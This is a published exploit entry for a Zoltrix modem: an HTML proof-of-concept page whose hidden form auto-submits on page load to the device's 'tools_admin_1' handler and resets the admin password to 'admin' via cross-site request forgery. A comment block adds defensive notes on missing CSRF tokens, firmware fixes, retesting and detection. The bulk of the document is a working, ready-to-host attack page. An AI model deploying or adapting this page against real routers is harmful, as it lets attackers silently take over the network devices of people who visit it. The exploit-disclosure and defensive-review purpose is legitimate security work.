# Exploit Title: Zoltrix Modem - 'tools_admin_1' Cross-Site Request Forgery (CSRF)
# Date: 2025-03-30
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.zoltrix-int.com/lander
# Version: 3.20.27.0_TC3087
# Tested on: Linux
# CVE: N/A
# Firmware Version: GAN4.GT205A-14-ZT-R9B011-IR.EN
<!doctype html>
<html>
  <head>
    <title>CSRF PoC</title>
  </head>
  <body>
    <!--
      Zoltrix Modem, 'tools_admin_1' Cross site request forgery
      BY:     Amir Hossein Jamshidi
      Mail:   amirhosseinjamshidi64@gmail.com
      github: https://github.com/amirhosseinjamshidi64
      Usage:  open http://localhost:9999/exploit.html

      Reviewer notes (defensive reading of this PoC):

      * The form below sends exactly two fields, the new password and its
        confirmation. The request carries no anti-CSRF token and no
        current-password field, so a device that accepts it cannot tell this
        cross-origin POST apart from one issued by its own admin page.
      * The PoC presumably relies on the browser already holding valid
        credentials for the device at 192.168.1.1; the page does not say how
        the session is authenticated. Confirm against the firmware.
      * Firmware-side fixes to look for: an unpredictable per-session token
        in every state-changing form, a mandatory current-password field on
        the password-change handler, Origin/Referer validation, and a
        SameSite attribute on the session cookie if cookies are used.
      * Retest criterion: with a fix in place, loading this page while logged
        in to the device must leave the admin password unchanged.
      * Operator-side: close the admin session after configuration work, and
        treat a POST to /Forms/tools_admin_1 whose Origin or Referer is not
        the device itself as an indicator worth alerting on.
    -->
    <h1>CSRF Proof of Concept</h1>
    <p>This page demonstrates a potential CSRF vulnerability.</p>

    <!-- Hidden password-change form aimed at the device's admin handler. -->
    <form id="csrf-form" method="POST" action="http://192.168.1.1/Forms/tools_admin_1">
      <input name="uiViewTools_Password" type="hidden" value="admin">
      <input name="uiViewTools_PasswordConfirm" type="hidden" value="admin">
    </form>

    <script>
      // The form is posted as soon as the load event fires; the visitor
      // performs no action, which is what makes the request "forged".
      window.addEventListener('load', function () {
        var passwordForm = document.querySelector('#csrf-form');
        passwordForm.submit();
      });
    </script>
  </body>
</html>